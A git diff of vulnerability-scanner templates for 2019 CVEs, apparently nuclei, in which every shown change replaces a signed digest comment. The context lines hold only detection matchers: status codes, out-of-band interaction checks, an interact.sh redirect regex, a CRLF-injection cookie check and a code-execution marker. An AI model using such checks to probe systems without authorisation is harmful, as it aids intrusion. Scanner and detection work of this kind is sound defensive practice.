a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b78e47211e9117540a361a7bbf61d48981be1df9f46a4082d26c40b81df38d6102200512ae445356bf97e4696e845580d7182fea7be874fd8a8faa74d11473c7cc31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9cefe4abc7fdad019d98919e8ef9f74edc413f523bc8300b344f6ad14137b8802203abbab9c423759cadf12903e6cf4b107694f8563d6a3ca13e2e3ed5aa61f41e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index ad952bf0f0..b00f7bcb58 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030e736d01799c2113774c8489d2c2e060bef7f6df8fab48352114e2422525da1022100e07a5694f1213b26096d937017a9cdfb6e8a3dbf07b62a4e0844545de0af6936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a612a75be6521437081f8bac9e2e5c62e04d1e42d6ee7b99a60598c63115beca022070efba7aa3de34d99bfb42f9b32688b464ede61623553b8ff6233087d08f5bde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 1853e78164..c04c68ea1d 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206e060526ed498e58aeb165e1a86c6dfb0f822270df28b1f37de9879abeb9453502205623412e5aa23b5444d28233dc3a09dd053b5d8c1d4138adc4bd5cf524207012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096f3aa0ccf71b8bb1f2b334d4e0d25631a25c29ecb407720f516c3b5aa1b054102202ccf8f52ed8812690ac44e08d4443f44f0d5601cdca85cae736756f4bad6074d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 5721c50f2a..d63c6453a7 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100defa8caef3bfc49d27462a363fbb840af42c8534de065f888f06b35299e8683f02204ecaa3467ff227bbd38b2b2cb2433ae54ea6ea587ec1ed3e9e30ef053c3ca6c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100835f91a6ead03e981e19a70bfc1e1d265a03ecb2cabe1981d35f7f48a3df2f54022100e55c02b83537d0a796b2b4741d3320de30665d586972c146596ff543b60ceec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index f0f2c59aab..2dc660635f 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022041e38ab4f69ae5bbc10c1c079445092bd9b7ba47ec94b0f26f11671207b071b7022100fc30926c548ed45e6650130f74877fd10143b2755ac1dcf25126cfef6c219132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b57c5627b5a07724a21a5b6c66b29bdd3b1853f86c93f7c5d3d8c8cbcae1a09022100af469eb16537815f6a042aa9a7ad7a3bbc7a1e08d77315ae599b5df1c512a322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 174046ade5..89f7376ac7 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -75,4 +75,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 490a0046304402202f0100438cbcf68274f7fff6ce478d2a2ca21f32f46deb898e207525f451475c0220712b1b32f8d0610d3efdce240df9bb5fa0894138f2d237d00a582b89c1c9d88b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2643129e31952e9cf7c3318b52efcac062acc9064a29d60c0f8103c8d3a0e58022100955f57a55270cc1d4529e495bfeeb27b66b8ac7a741e5af2e9f37ce321b3d2ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 80bc418778..128ff22994 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -60,4 +60,4 @@ http: part: body_2 words: - 'CVE-2019-17574' -# digest: 4a0a0047304502201cb7a532725f7804448ffc27f5f766edf3676e258b055224261a99d5047c48880221008ee525f52b9b04dc5b281d401e426a6c3519187ae7fa418713b6b6135c6ddc48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220353cbedd75e2b480e8f6f9d76a276dfbfb15fbf6a7152a3ecaa5ace8e4d6b56c022100ff9ed95c64ed4b24e578c332dc881f7dd9aa3d565d4f23fdc20a1ab9504139d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 092aec940b..bebd3f5fad 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202fb82bfb26b97edcb70f493b3640966574b012e563f89c2cdf77953916740bd2022100c643b657ac203096fd96e6dd9cd4a8942c4db7a202addc62e1a0390d913b83e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e93bbc96a7bb5945b58dada7d9b3c3b04ae3b8afaca4a545e1d62d129334aaf022100836757c1e5af51c0626ec9e6ba4d71c0a5b01b8465420f223446abaf209de755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 6812129e3c..f05491908a 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -60,4 +60,4 @@ http: - "status_code == 200" - "contains((body_2), '{{randstr}}')" condition: and -# digest: 4a0a0047304502205888e7c28a2ed34a699ba6a61abd7d0c921a1fa089b3ea0c8642abd3d44e024c022100ecc132734e78ce44fd4988a443a7fdfe894a409ef6a6b888ea12d9a141aa6eb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e50c4759b7fbf9e41eb62b443a4c39aadf3f8ebcedaae37654bd39f3b71f2aa30220491f018e5c581c55134ac4fef34785aeb9c11b5129928f9b1f9494da5c580b0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index 0c182487f7..0398a35e5a 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ceca95e0d23de7e0a57b502dd0f9cdbcb2ff6275f928581667d5d77e31bd462022100c5340466ae8dcfee1d77f4663912ab93da119436b3e23013e6b82fa1f43129ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049d0080c35443f8c2de85d54b855c30070a25fa6d9db43574025896344fdb2d102207db629aea428693523ca09a2655d8861316f7a962ced5b22ab67892601eb96f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index 884b7bef1d..8dfa30b3db 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c97dcd16b26a9f853e896fff16bdfca2e945384c8fb853575a97d914119567a402204e4dda75b4708e3172fcf572229e6bff3e9a9a9d07902016e47f10b21ac17682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100facc830da4786b48cef07848a6b14fcef6f8e742b8130beac4497f1f35629b3902210091898d99487171ca2d220c043f0e5c639a0c325ccc68f6132b3ffd0abc68c8d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 89dc5b1b26..abef22e9e1 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -43,4 +43,4 @@ http: - "contains(body, 'Interactsh Server')" - status_code == 200 condition: and -# digest: 4a0a00473045022100becd80dbf279426e7a1fe9e2ea9aaade6fcfdbf4779b94d39ce66df3c0b9bc64022071ce3b120374409a19b28421708bba3a36183bbec15e7eec5cd97a6bc7aa03a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093b0a98e94593cc39997cdeb7fe6300e3c3b67107346c1bef854fbe2db65078702204eb77fdfc7895a466d57edb6a462fa07823e2803b6ea4f5a67f0170ba6a3d3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 3cb803769b..78059e4bdb 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -45,4 +45,4 @@ http: - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")' - 'contains(header, "application/octet-stream")' condition: and -# digest: 4a0a00473045022067f8931eeb97e0fbffc1398a800aa506accd3b190b654c90cf98eccafda48444022100d3f77b11e58945d5ba55c13e661a4a09440e9213c8b66cb3c5aca2899f208872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d54f540b5b6aeff843c04a84ea89453b4f87d437225f5a58ad950aaf7b962d0902204e33ec81c762ae79110891ee18ab9502a9f1676025edb1130764a2cf293e6fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 2d3b16c8c7..45a98c24f8 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5ad53f288f5e762b0cc82cc9550c9579cd806364dc27e774066c5c39a609a7202200c305215c8277f0c9f1f33f65007eb54b3d20451039075bab6ad020fc8af7d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016bf100f90067e9f71145810f28c7a2914a641cf8e0444dd9a981a24de72d27c022100e1ffa50abf3d2a3f444ad0832b9e6b98de5887b3df7f8b70a8956e3a0a7b474d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 6ac759892a..bdc675f309 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d51d1c91d4fa4fbf61427615f603ea47c5bc63d21cffdeeaf3f3dbb158d2e300220205d9a4c11ed838c8184b612a4f403d8aea7add01d0aebedaefe25a41feb2e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100949bc4cf9ab6e192edfaa42fcadd34039e6cac53ec3d1a1c7da42d127a31f1d30221009ad9251990b61b0bdf32d6bfd521674fd82859a463284582ed414cb9c6e58295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index 6a3e56e3e2..9dcd6e9d39 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -45,4 +45,4 @@ http: part: header words: - "text/html" -# digest: 490a004630440220364007b5b353132d3e613a97b3c9f9453c1458e01438e0e259cd73afc23276ad022001dd8bc347d2107af7f57bd1fab63468c0320329d58618fcebf87bed4fd9c85d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024884faae7701b6a07896a32a39087a2bd23090324c05e7ce003a3d4d429d189022100a2877fdbbfec2596e80d0b083f7eaa688ab7187dddb5da4c2e4ca88d9523bd4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 0d1d5a74ce..6f80d05cdc 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100faf232bd3b470896bfd6f1839431dd8e6ead641fbbb1e451fca6962d26d4edd2022100a4c614560de90fa39676fe8a354bc91018b6af8965156c03a8cab5a1497d0698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8f5eff7bca85ed1b36cb2f33b5bcb13567551fd4de1a132441c2807c0d65df9022100ad45f03be3ef1bd869708b1fdeeefedad02b75fa3a6f1d3436d96859384b99c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index dc4e62d988..64ce0e918a 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022046ac7207d2f9331283e0b83f2ec5f492144749de02ae7a6eb328fc4c5c3d40270220014b1f4e41a4c8e7fb88abf43f8baf6f2673f8fd542c36dcc365a951f84516a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db3898e8debc70333898a4da2e52f2298915516a6f94567274fb028bb9ed6f3a02206de19519126f12ff63151aa49dcd6299983aececf7464e25cb9640c8ec5836a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 0ac744ddd1..6e29270446 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b58799e6f8127779c0e815988ea4492ea6d8636cc9b2d9a0c8b6619e4d8d6078022100e896460a50bf9af6cc431831d64f1bdb58867e720e5cf1e203c1ef4431670286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c3019a9fea0720e363c5b335733dbefff6b5b99f66f004b770fa8739902aec2022100d20ed4325f8dd9326a57e7425e052d6a47c83cfb30de22810211f067d3bfb132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 56e051bd92..d0020f0a6e 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402207b030508d41e46ca977aafde5198239546dfabdd24b41f6b88320a65b420e5be02204fda972f27c73ddeb480e4b4e8d7df69e7a95255fa1d2ecadddce1a24bdee125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f94a7523a6b2d3029683d487100c7471f31bc148f1a0279518a51a7c61df462902202538dac4a94f712e9756893e94183a58e214eea3ea8acb73ca67fcd85bb752b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index 86059f5e39..db6c812407 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -65,4 +65,4 @@ http: - 'status_code_2 == 202' - 'contains(body_3, "Vulnerable")' condition: and -# digest: 4a0a00473045022056f570dae3a475d8e9d5946b8f097ff6a3bc87242b915d980e8f79e50efedf23022100af5ffb8655d0e5c30dc211cc148590b77a9ac2dee63462cc90701bb0969ac0f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f965873795d6132a4fe1d816de74d2a90ee6ebfa58b436a5075983910d4853e9022100d5b679ab7b4c1f4b7702268a7fcfc9615bf6c6716008eb61463c3c15abd5409e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index e4b05c5215..474163baa2 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -84,4 +84,4 @@ http: - 'ta name="ajs\-draft\-id" content="([0-9]+)">' internal: true part: body -# digest: 490a00463044022043ba35e864a4f273e70a587b37a6fa0d0c24dc0d708b756d462b0829909266040220220f314ba326bf955773daff7b02179da1e97126da43b517b8ad8d5e49756d61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023954ef262e10a2797891b9272caadb091696a23cfcee6a3de46c63198faa3170220636a447d66efbafff4abbc6153a712e1b6975e19091066b9fae32ab88ef94a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 6aeb1e5a2a..d344db99a1 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -50,4 +50,4 @@ http: words: - 'total":0' negative: true -# digest: 490a00463044022021c6448062ef059db5ea10454e9e55dd92a9117357dfb9b76b7bbe0842b5092402201e66972cf86e8012b22c637acecaae205e71388f3505e43e39efdd3de79d2655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220290762bcec2beed2199cb1c76946cae39d8e7c30ed600299a74164da6ef2213302201cea66d51bba3fc6d2ab476107c10e675491eff401ab6c07f160e01fd236b216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 6ad85ae4f0..02eab793da 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210080958d27e9c319a8f826bc8633ae8dea6b7830aa6cfb161eb2e0f4f1d01c0ab3022100b1bfd54be5886f78aa773d769ca01fcd40f0a29602a0d50ab827e808e2eee8f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100884d5122af099bd55156669a663c8c00a457bb10e509802352655c7a53d6879e022100c0feba0e79bef233214a18c02f7fbb22b99df293f84784823f274a9f97888482:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index ed32bcca3a..3dc28e9443 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b986602e44e57d8dd80c107ede7843f1cf0bb5790402f300905465fe2166ec9f022067793b03e1155326998b4f5f27ea33968571672da4690ab1a1238b9435488da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011a4d3bb95c8b49735554bd5b28dccc1e9340ed8a46c2ae71f0bf6a03d4c4ab502201ebe9ab9c493dcce7b5f2b7f4c7026a979acc5709619e1f76d68973154487006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index ea223038cf..6e948b58a5 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502202facf9c390592bc28c4dac04cc1ee7e777ee2b9f47a1a52f34c28c22ea5dcc44022100eefac30fb0357569c6e6b9aedc343ad494f6fcad92bc166f018d57794331bcc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f07af3840286d9ccfe1b34ac6cd8a954010061efd3a318285138333eefcd0d2022100ed311673dbdfded599a378c849d3ade38c2ebf05a18105d53a3819e14b738844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index fa607c0894..40e5082092 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -45,4 +45,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100ccf45a30a0949e13352f9d8ccdecc245788d81fb5259b4479bc77e72e299013e022100e328fe52a893db43831f32097147a4b8dcd0320227934352060fb707689d7d47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022074632ab5f2a59cca98e6284bb1dd461c9d89bfbd5717e20f50733c4957b65a6a0221008db0aa0589332b13150c47886b51460d3ba6afa7cdfe8c497f56f5282ef779a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index 3b2a4fb1e7..6b6ca523b7 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206977a07953de010eddc2f06540e26386a2cf9ffb8840ba8598e45987d322863102202260d28f065e94df6bc8b6cdd7fa32ab97362e01a9448c8582bbf065add3d512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d3a098aa02e7c4945fd4f1588f1cf69a818ced0b8e9ba7058d677b96e911cbb02207e45cd2d1ce11cf167188d7c224ee6a24a3c8d2f5840dd3aea078d29c7883ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index b2cc82e5b9..fab810610f 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -49,4 +49,4 @@ http: status: - 200 - 500 -# digest: 4b0a00483046022100bb39db17c9c867c92d33f72fef56c67fa497d1e89c9dc71cde277df972174e9a022100f02cd6356c87d7d584aff94fdb763c948d072ec3cb74da6571c1128d00a5330e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef5c0fc32514296a1dc215d972a363458e1937dc3fed05fd4667a2a16319352d02207ee12a32e33866524e628d73e631350bca92a1b9e029d8b50d6b19ff3c1e5d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index df24f87f58..07618f185d 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d063d3e6f828763a627b1c547a29398d9d3271ba2577e671a648cfa9ffea26dd02207154351fd5498fdfc5b7bf9595690e8824b334442ccf2bbc53f4137aa14e6971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9c626ee5ef3923b221db82797355e601043d7433b1e3a8c7546f491bba9467002202f3194e5e78a7a77330d5db335bf625f737ef2b5f2de7dd693d7f89a015327e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 88c9839a3b..cee6cf394f 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204148335bd8f11801e7fbb2b94520c575443b57bf16aab575e9289a3dc771171a02201ecff3a217ab2b208717b766429d14241928ac31f73cabf9641a20673314d2b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afb58d1b7cf580535dfd6f4e76129f3d692b093a0d7b3122f04e4b39bab5af1a0220305814c2f5ae5e13c834c0d4bb8c18ce2c35f5e9ad8d7dbed344f075fd675044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 7c78ae9895..a7cc02aafa 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022036c14e9189a5d60f50772214bceb4a4a1bf4ca0f163bfb662e946c44b7eb5bd2022100a7d27b79d8be353543a2619258a0176f69bcb4d773b3aefca551a12cfc0ac787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099018f60b7746aa94f9e477510550ea78ad035347077dd9c02426f905c19888802202522ac15b9cfa70c5726edf93432fad537d8e32c1dd38f4e2acd34e71ff0e1f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index 69c29fdb54..893c2b9ebe 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -44,4 +44,4 @@ http: part: body words: - TmVzc3VzQ29kZUV4ZWNUZXN0 -# digest: 490a0046304402204f677dd8171607dac73d10045685d86930d800ddebe89e71c05dffa63994e07902203db4edb61d9901deb17ddf18cf5f165c93cac2014132dd2c19a8eeda939d982f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100988dabbe8f13200fc9059e871dabc13d87299ad78c355c74bc548875b67d65ab02205349110bdb55f168b07fc27b444459bf9abf2a86b35d618b36619ed4bea4534c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index 923762042a..bac3031a9f 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -104,4 +104,4 @@ http: - "X-Powered-By: PHP/([0-9.]+)" internal: true part: header -# digest: 4a0a00473045022100f236d158d8c90c01829fc76b9cf88685ed1b1987354c5f52f456093e540f12a402200d0ba2a6199fd82fb2d4dbbf0d7ec82fab8b799702f0fc891d340211793ac723:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f198d780023209330e131fc491747fd84b51b10da5886314e58c8db1d0a2903702202f4e181e8e32d0f890f657bcd09fa725ac064a5b4af0324e9f90cad16054861c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 5530d65be2..3af501e32f 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -41,4 +41,4 @@ http: part: header regex: - "^Set-Cookie: crlfinjection=1;" -# digest: 4b0a00483046022100b16ea55a337e17fdeb0193ad059d9f3556559826d3d9b7110ec51f9e15d266d4022100ee15738e338dcc606c28c92349ff94f11a276dee860966f3e460c235495bda74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef8a6d78cf7c93ec19c282d4e54d277c229b0aca051259648dfc32720c77c6de022073e99112fe73e6b0772db17d7f8ef694ca4f348c6a22884dfa73277b1f338ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 317c6cbaa6..2902504a75 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -86,4 +86,4 @@ http: regex: - encodeURIComponent\('([A-Za-z0-9]+)'\) internal: true -# digest: 490a00463044022038d4a2748704935b1e8bc5116823f31085bcbf7ea7e50794a573a764ae591c9302205bad9bbdd999c6e5f0f33dd0b4fe2e294705d0497bec580f6ecbad2993041d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e809e4edb98c43fcda4a8f03819bc69d23cc0335c63bce73175aa1d9bcbdaa9e022100d223c39ee719f6f76378454e15ce6d9c4ed3dfd429c7eaec2a861ed768dfcfc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index ae5c95c0c9..e556f453bb 100644 --- 